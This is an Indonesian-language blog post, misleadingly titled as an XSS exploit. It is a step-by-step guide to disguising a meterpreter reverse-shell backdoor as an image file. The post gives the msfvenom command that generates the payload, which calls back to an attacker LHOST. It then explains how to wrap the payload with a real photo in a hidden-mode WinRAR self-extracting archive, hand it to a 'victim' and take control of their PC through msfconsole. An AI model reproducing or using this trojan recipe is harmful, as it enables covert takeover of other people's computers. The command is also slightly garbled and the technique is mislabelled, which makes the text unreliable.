Senin, 20 November 2017

Exploit XSS with Image



Salah satu cara Exploit XSS sebuah web adalah melalui gambar. Berikut cara mengexplpoit XSS gambar.

1. Pertama kita cek ip address jaringan laptop kita dengan cara mengetikkan “ifconfig” pada terminal, kemudiankita membuat program(exe) yang akan menjadi backdoor di PC korban dengan cara mengetikkan di terminal : msfvenom -p windows/meterpreter/reserve_tcp LHOST 192.168.144.128 LPORT=4444 -f exe > nama_program.exe






2. Setelah itu kita membuat icon untuk program backdoor kita dengan menggunakan website icoconverter.com. kita upload gambar original kita terlebih dahulu, kemudian di sesuaikan dengan setting seperti pada gambar. Dan terakhir kita klik Convert Ico.








3. Dan hasilnya akan ada 3 file persiapan untuk membuat exploit gambar




4. Setelah itu kita copy 3 file tersebut ke OS Windows untuk membuat exploit gambar tersebut menggunakan aplikasi WinRar.






5. Setelah itu kita block atau pilih foto original dan aplikasi backdoor kita, klik kanan dan pilih add to archieve




6. Kemudian setting sesuai seperti digambar




7. Kemudian klik advanced, SFX Options...





8. Klik Setup isikan dengan nama gambar original serta nama program





9. Selanjutnya kita ke Text and icon agar aplikasi kita memiliki icon yang telah kita persiapkan tadi.




10. Lalu kita ke Modes untuk menghide(menyembunyikan) semua aktivitas program backdoor dan hanya akan mengeksekusi gambar, sehingga pada saat membuka program layaknya membuka file gambar seperti biasanya. Tetapi pada saat yang bersamaan program telah melakukan pengeksekusian untuk membuat backdoor pada PC korban






11. Dan hasil dari settingan tadi ialah seperti gambar biasa.






12. Dan tinggal kita berikan program yang telah kita buat tadi ke Korban dan menunggu korban membuka di Pcnya. Dan hasil setelah program dibuka ialah layaknya gambar biasanya.





13. Kemudian kita kembali ke OS Kali Linux untuk meremote PC Korban, buka terminal dan ketikkan msfconsole, dan ikuti langkah selanjutnya






14. Setelah kita memasukkan perintah exploit maka hasilnya ialah sepeti ini, dan kita sudah mendapatkan akses untuk mengontrol PC Korban





Tidak ada komentar:

Posting Komentar